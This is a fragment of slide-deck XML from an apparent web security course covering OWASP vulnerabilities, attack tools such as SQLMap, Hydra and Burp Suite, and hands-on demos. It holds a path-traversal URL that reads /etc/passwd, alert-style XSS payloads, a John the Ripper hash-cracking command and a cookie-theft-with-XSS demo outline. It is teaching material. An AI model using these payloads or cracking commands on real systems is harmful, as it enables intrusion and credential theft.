                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://acme.com/menu.php?page=../../../../../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dumps user info on linux systems</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LDAP Injection - Can cause data leaks from Active directory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Sensitive Data Exposure</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APIs control access to resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Get a user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Get a product</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Typically resources map to a database table</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User Table: name, email, role, password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lazy Developers can expose too much data by writing a query that is too broad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result needs filtered to remove the user passwords before sending it to the client</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Google Shape;163;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="674425" y="3063075"/>
            <a:ext cx="5343025" cy="43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Broken Access Control</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Distinction between Authentication and Authorization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Restrictions on Authenticated Users aren’t properly enforced</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User logs in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://acmebank.com/account/12345</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User navigates to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://acmebank.com/account/98765</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User logs into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://spybook.com/user/12345/changepassword</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User navigates to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://spybook.com/user/98765/changepassword</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In each case, web app must determine whether user is allowed to access the account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type of Injection where the attacker wants to load javascript in the victim’s browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browsers maintain session via cookies and browser storage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If a user can be tricked into running the javascript, the attacker can exfiltrate this sensitive data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Two types of XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Reflected - http://acme.com/contact.php?name=&lt;script&gt;alert(‘broken’);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stored - Javascript is submitted to a form which is saved in a database.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Attack Tools</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Automation of Recon and Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can also be used as defense / penetration testing tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DirBuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>THC Hydra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browser Tools (developer tools, cookie manager / manipulator)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471900" y="1919075"/>
            <a:ext cx="8222100" cy="304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What is HTTP? (maybe)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What Is Web Forensics?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cyber Kill Chain / Web Kill Chain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Attack Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Live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Nikto</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Scans for misconfigurations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Targets web servers (apache, IIS), not application code (JAVA, php)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DirBuster / robots.txt</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Scans for pages / routes that are not on the navigation menu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uses wordlists to search common paths</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>docs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Retrieves robots.txt file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used for search engine optimization, can reveal areas of interest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defenders: robots.txt is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a security tool, it’s a beacon for attackers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Burp Suite</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Proxy tool / request manipulation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proxy Intercepts traffic from attacker to victim. Inspect before sending</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Repeater - manual request replay</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Intruder - automated request repeater. Useful for password spraying attacks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Map</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Automates detection and exploitation of SQL injection flaws</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can detect database type (MSSQL vs MySQL vs SQLite)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can enumerate databases and tables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1a: Manual Recon</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Q1: What are the organizations email formats?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Q2: What are some existing Usernames? Do they give too much info on error messages?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Q3: Who wrote the Application?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Q4: What Language / Framework was it written in?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Q5: What version of web server?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Q6: Are there any CVEs against this framework/version?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1b: Recon with DirBuster</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Q1: Are there any interesting pages not in the navigation menu?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3: Get Users, Crack Hashes</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info we learned on Demo 2b, we can start cracking hashes.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Option 1: John The Ripper</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Option 2: Crackstation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4: Cookie Theft with XSS</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know if a form is vulnerable to xss?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Common payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;script&gt;alert(‘hello’);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In XSS the goal is to coerce (or wait for) the user to run your payload in the browser.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How can we cause the victim to make a request to a webserver we control?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Theft, cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="235" name="Google Shape;235;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1017725"/>
            <a:ext cx="6754747" cy="3973376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458600" y="4145500"/>
            <a:ext cx="875100" cy="4605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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230300" y="4545825"/>
            <a:ext cx="22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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
